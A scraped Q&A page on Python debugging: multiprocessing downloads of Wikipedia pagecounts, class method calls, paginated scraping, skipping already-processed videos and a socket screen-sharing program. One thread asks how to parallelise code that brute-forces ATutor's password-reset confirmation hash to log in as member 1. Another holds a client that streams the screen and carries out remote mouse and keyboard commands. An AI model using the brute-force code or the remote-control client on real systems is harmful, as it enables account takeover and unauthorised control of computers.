MaybeEncodingError: Error sending result: '<multiprocessing.pool.ExceptionWithTraceback object at 0x0000018F09F334A8>' - python-3.x

I am getting the below error when I am downloading files using multiprocessing. I am downloading Wikipedia page views and they have it by hour so it might include a lot of downloading.
Any recommendation to why this error is caused and HOW TO SOLVE IT? Thanks
MaybeEncodingError: Error sending result:
''. Reason: 'TypeError("cannot serialize
'_io.BufferedReader' object",)'
import fnmatch
import requests
import urllib.request
from bs4 import BeautifulSoup
import multiprocessing as mp
def download_it(download_file):
global path_to_save_document
filename = download_file[download_file.rfind("/")+1:]
save_file_w_submission_path = path_to_save_document + filename
request = urllib.request.Request(download_file)
response = urllib.request.urlopen(request)
data_content = response.read()
with open(save_file_w_submission_path, 'wb') as wf:
wf.write(data_content)
print(save_file_w_submission_path)
pattern = r'*200801*'
url_to_download = r'https://dumps.wikimedia.org/other/pagecounts-raw/'
path_to_save_document = r'D:\Users\Jonathan\Desktop\Wikipedia\\'
def main():
global pattern
global url_to_download
r = requests.get(url_to_download)
data = r.text
soup = BeautifulSoup(data,features="lxml")
list_of_href_year = []
for i in range(2):
if i == 0:
for link in soup.find_all('a'):
lien = link.get('href')
if len(lien) == 4:
list_of_href_year.append(url_to_download + lien + '/')
elif i == 1:
list_of_href_months = []
list_of_href_pageviews = []
for loh in list_of_href_year:
r = requests.get(loh)
data = r.text
soup = BeautifulSoup(data,features="lxml")
for link in soup.find_all('a'):
lien = link.get('href')
if len(lien) == 7:
list_of_href_months.append(loh + lien + '/')
if not list_of_href_months:
continue
for lohp in list_of_href_months:
r = requests.get(lohp)
data = r.text
soup = BeautifulSoup(data,features="lxml")
for link in soup.find_all('a'):
lien = link.get('href')
if "pagecounts" in lien:
list_of_href_pageviews.append(lohp + lien)
matching_list_of_href = fnmatch.filter(list_of_href_pageviews, pattern)
matching_list_of_href.sort()
with mp.Pool(mp.cpu_count()) as p:
print(p.map(download_it, matching_list_of_href))
if __name__ == '__main__':
main()

As Darkonaut proposed. I used multithreading instead.
Example:
from multiprocessing.dummy import Pool as ThreadPool
'''This function is used for the download the files using multi threading'''
def multithread_download_files_func(self,download_file):
try:
filename = download_file[download_file.rfind("/")+1:]
save_file_w_submission_path = self.ptsf + filename
'''Check if the download doesn't already exists. If not, proceed otherwise skip'''
if not os.path.exists(save_file_w_submission_path):
data_content = None
try:
'''Lets download the file'''
request = urllib.request.Request(download_file)
response = urllib.request.urlopen(request)
data_content = response.read()
except urllib.error.HTTPError:
'''We will do a retry on the download if the server is temporarily unavailable'''
retries = 1
success = False
while not success:
try:
'''Make another request if the previous one failed'''
response = urllib.request.urlopen(download_file)
data_content = response.read()
success = True
except Exception:
'''We will make the program wait a bit before sending another request to download the file'''
wait = retries * 5;
time.sleep(wait)
retries += 1
except Exception as e:
print(str(e))
'''If the response data is not empty, we will write as a new file and stored in the data lake folder'''
if data_content:
with open(save_file_w_submission_path, 'wb') as wf:
wf.write(data_content)
print(self.present_extract_RC_from_RS + filename)
except Exception as e:
print('funct multithread_download_files_func' + str(e))
'''This function is used as a wrapper before using multi threading in order to download the files to be stored in the Data Lake'''
def download_files(self,filter_files,url_to_download,path_to_save_file):
try:
self.ptsf = path_to_save_file = path_to_save_file + 'Step 1 - Data Lake\Wikipedia Pagecounts\\'
filter_files_df = filter_files
self.filter_pattern = filter_files
self.present_extract_RC_from_RS = 'WK Downloaded-> '
if filter_files_df == '*':
'''We will create a string of all the years concatenated together for later use in this program'''
reddit_years = [2005,2006,2007,2008,2009,2010,2011,2012,2013,2014,2015,2016,2017,2018]
filter_files_df = ''
'''Go through the years from 2005 to 2018'''
for idx, ry in enumerate(reddit_years):
filter_files_df += '*' + str(ry) + '*'
if (idx != len(reddit_years)-1):
filter_files_df += '&'
download_filter = list([x.strip() for x in filter_files_df.split('&')])
download_filter.sort()
'''If folder doesn't exist, create one'''
if not os.path.exists(os.path.dirname(self.ptsf)):
os.makedirs(os.path.dirname(self.ptsf))
'''We will get the website HTML elements using beautifulsoup library'''
r = requests.get(url_to_download)
data = r.text
soup = BeautifulSoup(data,features="lxml")
list_of_href_year = []
for i in range(2):
if i == 0:
'''Lets get all href available on this particular page. The first page is the year page'''
for link0 in soup.find_all('a'):
lien0 = link0.get('href')
'''We will check if the length is 4 which corresponds to a year'''
if len(lien0) == 4:
list_of_href_year.append(url_to_download + lien0 + '/')
elif i == 1:
list_of_href_months = []
list_of_href_pageviews = []
for loh in list_of_href_year:
r1 = requests.get(loh)
data1 = r1.text
'''Get the webpage HTML Tags'''
soup1 = BeautifulSoup(data1,features="lxml")
for link1 in soup1.find_all('a'):
lien1 = link1.get('href')
'''We will check if the length is 7 which corresponds to the year and month'''
if len(lien1) == 7:
list_of_href_months.append(loh + lien1 + '/')
for lohm in list_of_href_months:
r2 = requests.get(lohm)
data2 = r2.text
'''Get the webpage HTML Tags'''
soup2 = BeautifulSoup(data2,features="lxml")
for link2 in soup2.find_all('a'):
lien2 = link2.get('href')
'''We will now get all href that contains pagecounts in their name. We will have the files based on Time per hour. So 24 hrs is 24 files
and per year is 24*365=8760 files in minimum'''
if "pagecounts" in lien2:
list_of_href_pageviews.append(lohm + lien2)
existing_file_list = []
for file in os.listdir(self.ptsf):
filename = os.fsdecode(file)
existing_file_list.append(filename)
'''Filter the links'''
matching_fnmatch_list = []
if filter_files != '':
for dfilter in download_filter:
fnmatch_list = fnmatch.filter(list_of_href_pageviews, dfilter)
i = 0
for fnl in fnmatch_list:
'''Break for demo purpose only'''
if self.limit_record != 0:
if (i == self.limit_record) and (i != 0):
break
i += 1
matching_fnmatch_list.append(fnl)
'''If the user stated a filter, we will try to remove the files which are outside that filter in the list'''
to_remove = []
for efl in existing_file_list:
for mloh in matching_fnmatch_list:
if efl in mloh:
to_remove.append(mloh)
'''Lets remove the files which has been found outside the filter'''
for tr in to_remove:
matching_fnmatch_list.remove(tr)
matching_fnmatch_list.sort()
'''Multi Threading of 200'''
p = ThreadPool(200)
p.map(self.multithread_download_files_func, matching_fnmatch_list)
except Exception as e:
print('funct download_files' + str(e))

From the accepted answer, I understood that it is simply replacing from multiprocessing import Pool by from multiprocessing.dummy import Pool.
This worked for me.

Related

How to Call function from another function [duplicate]

This question already has answers here:
How can I call a function within a class?
(2 answers)
Closed 2 years ago.
I tried to call a function in the other function but it is returning an error.
class Data_Wrangling:
def __init__(self):
self.ClassName = type(self).__name__ + '.'
self.Host = None
self.App_Id = None
self.App_Secret = None
self.PySpace = None
def Data_Retrieve(self,URL):
print('\n<> ' + inspect.currentframe().f_code.co_name)
JsonData = None
ST = time.time()
while JsonData is None:
try:
Response = requests.get(URL)
except Exception as E:
print('\n>> Failed: ' + str(E))
if (time.time() - ST)/60 > 1:
print('\n>> Failed: NO valid JsonData Retrieved - Source Down or Internet Issue, etc')
break
JsonData = None
continue
if Response.status_code == 200:
try:
JsonData = json.loads(Response.content.decode('utf-8'))
except Exception as E:
print('\n>> Failed: ' + str(E))
JsonData = None
continue
KN.TPE(ST)
return JsonData
def Processing(self, DatasetId):
Start_Date = '1900-01'
today = datetime.today()
End_Range = str(today.year)+ '-' + str(today.month)
Limit = 5000
Page = 1
URL_Part1 = 'https://maps.clb.org.hk/map/pageList?keyword=&startDate='
URL_Part2 = '&endDate='
URL_Part3 = '&address=&industry=&parentIndustry=&industryName=&accidentType=&accidentTypeName=&companyOwnership=&companyOwnershipName=&deathsNumber=&deathsNumberName=&injuriesNumber=&injuriesNumberName=&mapType=2&page='
URL_Part4 = '&limit='
URL = URL_Part1 + Start_Date + URL_Part2 + End_Range + URL_Part3 + str(Page) + URL_Part4 + str(Limit)
JsonData = Data_Retrieve(URL)
DW = Data_Wrangling()
Export_FilePath = DW.Processing('dtihwnb')
I receive error as:
JsonData = Data_Retrieve(URL)
NameError: name 'Data_Retrieve' is not defined
I am stuck here, thinking what is the issue that I have made here. Please help I am calling Data_Retrieve in Processing.
you need to call Data_Retrieve method using self because its inside the class.
Try to call your method like this..
JsonData = self.Data_Retrieve(URL)

Converting Existing Python3 Method to Use Multiprocessing

I have a method that iterates through a load of values and send a requests call for each. This works fine however it takes a LONG time. I want to speed this up using multiprocessing in Python3.
My question is what is the correct way to implement this using multiprocessing so I can speed up these requets?
The existing method is as so:
def change_password(id, prefix_length):
count = 0
# e = None
# m = 0
for word in map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length))):
# code = f'{word}{id}'
h = hash_string(word)[0:10]
url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
print(f"Issuing reset request with: {h}")
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
s = requests.Session()
res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
if res.status_code == 302:
return True, s.cookies, count
else:
count += 1
return False, None, count
I have tried to convert it based on the first example in the Python3 docs here however it just seems to hang when I start the script. No doubt I have implemented it wrong
def send_request(word):
# code = f'{word}{id}'
h = hash_string(word)[0:10]
url = f'http://atutor/ATutor/confirm.php?id=1&m={h}&member_id=1&auto_login=1'
print(f"Issuing reset request with: {h}")
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
s = requests.Session()
res = s.get(url, proxies=proxies, headers={"Accept": "*/*"})
if res.status_code == 302:
return True, word
else:
return False
It is being called from a modified version of the original method as so:
def change_password(id, prefix_length):
count = 0
# e = None
# m = 0
words = map(''.join, itertools.product(string.ascii_lowercase, repeat=int(prefix_length)))
with Pool(10) as pool:
results, word = pool.map(send_request, words)
if results:
return True, word

How do I Count up in a url while capturing source code

I want to loop though a number of url requests but I'm having an issue, when I run the code it doesnt loop though all the numbers and only requests the page once with the output.
So my question is, how do I loop though the numbers in the url while requesting each one + capturing all the source code I need. Everything works except the counting.
this is the code I have managed to write so far
import urllib.request
import re
count = 1
while count <= 44:
url = ('https://example/page=%i' % count)
count += 1
req = urllib.request.Request(url)
resp = urllib.request.urlopen(req)
respData = resp.read()
paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td',str(respData))
for eachP in paragraphs:
print(eachP)
You have problem in your loop you iterate over all 44 urls, but request only last one url, this is correct implementation:
import urllib.request
import re
def handle_url(url):
req = urllib.request.Request(url)
resp = urllib.request.urlopen(req)
respData = resp.read()
paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td',str(respData))
for eachP in paragraphs:
print(eachP)
count = 1
while count <= 44:
handle_url('https://example/page=%i' % count)
count += 1
if you don't like function you can simply move all to while loop:
import urllib.request
import re
def handle_url(url):
count = 1
while count <= 44:
url = 'https://example/page=%i' % count
count += 1
req = urllib.request.Request(url)
resp = urllib.request.urlopen(req)
respData = resp.read()
paragraphs = re.findall(r';"><span>(.*?)</span></a></td><td',str(respData))
for eachP in paragraphs:
print(eachP)

Do not process already present data

I have a folder in which there are some video files. I want to extract frames from the videos but only those videos should be processed whose names are not present in the csv. It should check for the present video file names in the csv before processing the videos
def extractFrames(m):
global vid_name
vid_files=glob(m)
print(vid_files)
complete_videos = get_completed_videos()
print(complete_videos)
new_vid_files = [x for x in vid_files if get_vid_name(x) not in complete_videos]
for vid in new_vid_files:
print("path of video========>>>>.",vid)
v1=os.path.basename(vid)
try:
vid_name = get_vid_name(vid)
vidcap = cv2.VideoCapture(vid)
except cv2.error as e:
print(e)
except:
print('error')
#condition
fsize=os.stat(vid)
print('=============size of video ===================:' , fsize.st_size)
try:
if (fsize.st_size > 1000):
fps = vidcap.get(cv2.CAP_PROP_FPS) # OpenCV2 version 2 used "CV_CAP_PROP_FPS"
frameCount = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
duration = frameCount/fps
minutes = int(duration/60)
print('fps = ' + str(fps))
print('number of frames = ' + str(frameCount))
print('duration (S) = ' + str(duration))
if (duration > 1):
success,image = vidcap.read()
count=0
success=True
while success:
img_name = vid_name + '_f' + str(count) + ".jpg"
success,image = vidcap.read()
if count % 10 == 0 or count ==0:
target_non_target(img_name, image)
count+=1
vidcap.release()
cv2.destroyAllWindows()
except:
print("error")
print('finished processing video ',vid)
with open("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\"+'video_info.csv', 'a') as csv_file:
fieldnames = ['Video_Name','Process']
file_is_empty = os.stat("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\"+'video_info.csv').st_size == 0
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
if file_is_empty:
writer.writeheader()
writer.writerow({'Video_Name':vid_name,'Process':'done'})
def get_vid_name(vid):
return os.path.splitext(os.path.basename(vid))[0]
def get_completed_videos():
completed_videos = []
with open("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\video_info.csv") as csv_file:
for row in csv.reader(csv_file):
for col in range(0,len(row)):
try:
completed_videos.append(row[col])
except Exception as e:
print(str(e))
print(completed_videos[0])
return completed_videos
Suppose there are 3 videos in a folder. Code is successfully run for those 3 videos and their names are written in the csv. Now if i paste video number 4 in the folder then it should process only the 4th video after checking for the video names present in the csv. Currently it is repeatedly processing all the video files everytime the script is run.
First off, inside the for loop
v1=os.path.basename(vid_files[v_f])
Should be
v1=os.path.basename(new_vid_files[v_f])
Since you are looping over the new_vid_files range. Using those indices on the original list will give you unexpected items. Better yet, you can directly use a for-each loop (since you don't seem to be using v_f for anything other than list access) as follows:
for vid in new_vid_files:
And this vid would replace all instances of new_vid_files[v_f].
Next, you are using vid_name to write to the csv, so you need to perform the same operation for each item from vid_files before matching against complete_videos while creating the new_vid_files list.
If you create a method for getting the video name as follows:
def get_vid_name(vid_file):
return os.path.splitext(os.path.basename(vid_file))[0]
Then you can change the list comprehension to be
new_vid_files = [x for x in vid_files if get_vid_name(x) not in complete_videos]
Edit: As mentioned in the comments to the other answer, the output for complete_videos indicates it isn't being parsed properly. It is appending both the column headers and other unneeded columns. This code will work despite that, but it needs to be fixed. I am not solving it because it is a relatively simple change, and I want the OP to understand what they're doing wrong.
def extractFrames(m):
global vid_name
vid_files=glob(m)
print(vid_files)
complete_videos = get_completed_videos()
new_vid_files = [x for x in vid_files if get_vid_name(x) not in complete_videos]
for vid in new_vid_files:
print("path of video========>>>>.",vid)
v1=os.path.basename(vid)
try:
vid_name = get_vid_name(vid)
vidcap = cv2.VideoCapture(vid)
except cv2.error as e:
print(e)
except:
print('error')
#condition
fsize=os.stat(vid)
print('=============size of video ===================:' , fsize.st_size)
try:
if (fsize.st_size > 1000):
fps = vidcap.get(cv2.CAP_PROP_FPS) # OpenCV2 version 2 used "CV_CAP_PROP_FPS"
frameCount = int(vidcap.get(cv2.CAP_PROP_FRAME_COUNT))
duration = frameCount/fps
minutes = int(duration/60)
print('fps = ' + str(fps))
print('number of frames = ' + str(frameCount))
print('duration (S) = ' + str(duration))
if (duration > 1):
success,image = vidcap.read()
count=0
success=True
while success:
img_name = vid_name + '_f' + str(count) + ".jpg"
success,image = vidcap.read()
if count % 10 == 0 or count ==0:
target_non_target(img_name, image)
count+=1
vidcap.release()
cv2.destroyAllWindows()
except:
print("error")
print('finished processing video ',vid)
with open("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\"+'video_info.csv', 'a') as csv_file:
fieldnames = ['Video_Name','Process']
file_is_empty = os.stat("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\"+'video_info.csv').st_size == 0
writer = csv.DictWriter(csv_file, fieldnames=fieldnames)
if file_is_empty:
writer.writeheader()
writer.writerow({'Video_Name':vid,'Process':'done'})
def get_vid_name(vid):
return os.path.splitext(os.path.basename(vid))[0]
def get_completed_videos():
completed_videos = []
with open("C:\\multi_cat_3\\models\\research\\object_detection\\my_imgs\\video_info.csv") as csv_file:
for row in csv.reader(csv_file):
for col in range(0,len(row)):
try:
completed_videos.append(row[col])
except Exception as e:
print(str(e))
print(completed_videos[0])
return completed_videos

python 2.7 thread not running correctly

I have been fighting with a threaded send of an string image over python sockets for a while now and have had no luck on this issue.
code for the client side is:
import socket
from PIL import ImageGrab #windows only screenshot
from threading import Thread
import win32api, win32con
import re
import win32com.client
import getpass
import time
import select
shell = win32com.client.Dispatch("WScript.Shell")
host = raw_input("SERVER:")
dm = win32api.EnumDisplaySettings(None, 0)
dm.PelsHeight = 800
dm.PelsWidth = 600
win32api.ChangeDisplaySettings(dm, 0)
port = 9000
def picture():
while 1:
image = ImageGrab.grab().resize((800,600)) #send screen as string
data = image.tostring()
sendme = (data)
try:
s.sendall(sendme)
print ("sent")
except socket.error as e:
print e
except Exception as e:
print e
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
pict = Thread(target=picture)
pict.start()
while 1:
socket_list = [s]
# Get the list sockets which are readable
read_sockets, write_sockets, error_sockets = select.select(socket_list , [], [])
for sock in read_sockets:
if sock == s:
data = sock.recv(1024)
print data
if "LEFTC" in data:
data = data.replace("LEFTC","")
x = re.findall(r'X(.*?)Y',data)
y = re.findall(r'Y(.*?)EOC',data)
x = str(x)
y = str(y)
#REPLACE CODE TO BE REWRITTEN
x = x.replace("[","").replace("]","").replace("'","").replace(" ","")
y = y.replace("[","").replace("]","").replace("'","").replace(" ","")
print(str(x) + ' X\n')
print(str(y) + ' Y\n')
try:
win32api.SetCursorPos((int(x),int(y))) #click time
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,int(x),int(y),0,0)
win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,int(x),int(y),0,0)
except Exception as e:
print e
elif "RIGHTC" in data:
data = data.replace("RIGHTC","")
x = re.findall(r'X(.*?)Y',data)
y = re.findall(r'Y(.*?)EOC',data)
x = str(x)
y = str(y)
#REPLACE FUNCTION MAREKD FOR REWRITE
x = x.replace("[","").replace("]","").replace("'","").replace(" ","")
y = y.replace("[","").replace("]","").replace("'","").replace(" ","")
print(str(x) + ' X\n')
print(str(y) + ' Y\n')
try: #click
win32api.SetCursorPos((int(x),int(y)))
win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTDOWN,int(x),int(y),0,0)
win32api.mouse_event(win32con.MOUSEEVENTF_RIGHTUP,int(x),int(y),0,0)
except Exception as e:
print e
else:
#This does not work correctly: only BACKSPACE and the else are working.
if "CAPS" in data:
shell.SendKeys('{CAPSLOCK}')
elif "CAPSOFF" in data:
shell.SendKeys('{CAPSLOCK}')
elif "BACKSPACE" in data:
shell.SendKeys('{BACKSPACE}')
elif "SHIFT" in data:
shell.SendKeys('+' + data)
else:
shell.SendKeys(data)
time.sleep(0.1)
server code is:
import socket
import pygame
from pygame.locals import *
from threading import Thread
x = y = 0
host = ""
#port defined here
port = 9000
#This list is used to make the library more pythonic and compact. This also leads to less source code.
keylist = [pygame.K_a,pygame.K_b,pygame.K_c,pygame.K_d,pygame.K_e,pygame.K_f,pygame.K_g,pygame.K_h,pygame.K_i,pygame.K_j,pygame.K_k,pygame.K_l,pygame.K_m,pygame.K_n,pygame.K_o,pygame.K_p,pygame.K_q,pygame.K_r,pygame.K_s,pygame.K_t,pygame.K_u,pygame.K_v,pygame.K_w,pygame.K_x,pygame.K_y,pygame.K_z]
key = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','1','2','3','4','5','6','7','8','9','0']
i/o function
def ioinput(sock):
while 1:
evt = pygame.event.poll() #has to be in the same while loop as the evt called or wont work.
if evt.type == pygame.MOUSEBUTTONDOWN and evt.button == 1: # one for left
x, y = evt.pos
command = ("LEFTC" + " " + "X" + str(x) + "Y" + str(y) + "EOC")
sock.sendall(command)
elif evt.type == pygame.MOUSEBUTTONDOWN and evt.button == 3: # 3 for right 2 is middle which support comes for later.
x, y = evt.pos
command = ("RIGHTC" + " " + "X" + str(x) + "Y" + str(y) + "EOC")
sock.sendall(command)
elif evt.type == pygame.KEYDOWN:
keyname = pygame.key.name(evt.key)
if evt.key == pygame.K_BACKSPACE:
command = ("BACKSPACE")
sock.sendall(command)
elif evt.key in keylist:
if keyname in key:
command = (keyname)
sock.sendall(command)
def mainloop():
message = []
while 1:
try:
while True:
try:
conn, addr = server.accept()
except socket.error:
break
screen = pygame.display.set_mode((800,600))
clickctrl = Thread(target=ioinput, args=(conn,))
clickctrl.start()
while 1:
d = conn.recv(1024*1024*1)
if not d:
break
else:
message.append(d)
data = ''.join(message)
image = pygame.image.frombuffer(data,(800,600),"RGB")
screen.blit(image,(0,0))
pygame.display.flip()
except Exception as e:
continue
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.setblocking(False)
server.bind((host, port))
server.listen(55000)
print "Listening on %s" % ("%s:%s" % server.getsockname())
Main event loop.
mainloop()
The picture thread will run 3 to six times then die however the keyboard and mouse input layer continues to operate. I suspect that the GIL is getting in my way. Am i correct or am I missing something really simple here? This program is supposed to be a simplistic reverse remote desktop appication.
I found the problem after speaking with a good friend. turns out that my server side while loop was setup so that it would break.
i fixed this by changing:
while 1:
d = conn.recv(1024*1024*1)
if not d:
break
else:
message.append(d)
data = ''.join(message)
image = pygame.image.frombuffer(data,(800,600),"RGB")
screen.blit(image,(0,0))
pygame.display.flip()
to :
while 1:
d = conn.recv(1024*1024*1)
message.append(d)
try:
print("attempting to parse..")
data = ''.join(message)
image = pygame.image.frombuffer(data,(800,600),"RGB")
screen.blit(image,(0,0))
pygame.display.flip()
print("recieved pic")
except Exception as e:
print e
continue
Also, client side on the picture thread i added a time.sleep (1) after the exception handling, otherwise the image does not come though correctly.

Resources